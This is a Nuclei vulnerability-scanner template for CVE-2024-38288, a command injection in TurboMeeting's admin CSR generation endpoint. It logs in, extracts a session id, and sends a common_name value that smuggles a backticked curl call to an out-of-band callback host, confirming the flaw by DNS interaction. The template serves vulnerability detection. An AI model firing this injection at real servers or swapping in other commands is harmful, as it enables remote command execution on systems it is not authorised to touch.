id: CVE-2024-38288 info: name: TurboMeeting - Post-Authentication Command Injection author: rootxharsh,iamnoooob,pdresearch severity: high description: | The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges. reference: - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c - https://www.rhubcom.com/v5/manuals.html classification: epss-score: 0.00043 epss-percentile: 0.09357 metadata: verified: true max-request: 2 shodan-query: html:"TurboMeeting" tags: cve,cve2024,rce,turbomeeting,authenticated variables: username: "{{username}}" password: "{{password}}" flow: http(1) && http(2) http: - raw: - | POST /as/wapi/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login matchers: - type: word part: body words: - "as/wapi/profile_entry?sid=" internal: true extractors: - type: regex name: sid part: body group: 1 regex: - 'sid=(.*?)"' internal: true - raw: - | @timeout: 20s POST /as/wapi/generate_csr HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR matchers-condition: and matchers: - type: word part: body words: - CSR - SSL condition: and - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "dns" # digest: 490a004630440220203de4258c77f0b3f46006707f45d197100eab841ddda3976bf550870b81c67d02205b75ab453b0008ab9bcc928e6784877017f3814bbaa8e6cf840548b94623316b:922c64590222798bb761d5b6d8e72950